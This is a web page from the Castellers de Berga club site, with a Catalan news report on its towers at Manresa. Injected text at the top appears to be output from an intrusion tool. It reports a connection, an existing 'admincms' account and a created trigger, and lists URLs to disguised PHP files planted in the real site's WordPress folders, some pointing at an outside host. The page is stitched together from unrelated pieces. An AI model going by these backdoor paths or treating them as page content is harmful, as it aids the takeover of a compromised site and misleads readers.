Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?stream https://castellersdeberga.cat/wp-admin/themes-meta-meta-wp-private-wp-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-community-events-core-wp-ajax-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-upgrader-ajax-private-private-ajax-response-cron.php https://castellersdeberga.cat/wp-content/plugins/google-calendar-events/uninstall-wp-ajax-core-core.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/layerslider-stream-wp-meta-private-ajax-response-ajax-response-ajax-response-ajax-stream-wp.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-base64-wp-wp-wp-wp.php https://castellersdeberga.cat/wp-includes/https-migration-private-core-cron.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Dos castells més de 7 pisos a Manresa
 

Dos castells més de 7 pisos a Manresa


Dos castells més de 7 pisos a ManresaEls Castellers de Berga descarreguen 3 i 4 de 7 a la plaça Crist Rei. Tornaven a actuar després de fer-ho a Sabadell el 12 d’octubre. El 26 d’octubre havien d’haver actuat a Berga però la diada es va suspendre per la situació política i social que està travessant el país. A Manresa, en primera ronda, els berguedans han descarregat l’onzè 3 de 7 de la temporada. En segona ronda, s’ha descarregat el 4 de 7, un castell que s’havia portat per última vegada a plaça el 29 de juny, a Alp. Des del 20 de juliol que els berguedans no descarregaven més d’un castell de 7 pisos a la mateixa actuació. És a dir, bones sensacions per als de la camisa blava però ha estat en una diada que ha vist el seu final abans del que s’esperava.

Per la seva banda, els Castellers de Castelldefels havien començat descarregant el 3 de 7 i els Tirallongues de Manresa, el 4 de 8. En segona ronda, els Tirallongues han fet un intent desmuntat del 3 de 8. Hi han tornat amb el 3 de 8 i ha caigut instants després de fer l’aleta. Degut a les atencions mèdiques i l’aturada de l’actuació s’ha decidit deixar la diada per acabada.

Els Castellers de Berga encara no han finalitzat la temporada. Ho faran el diumenge 10 de novembre, a Vic, en una diada amb els Sagals d’Osona, Tirallongues de Manresa i Castellers de Figueres.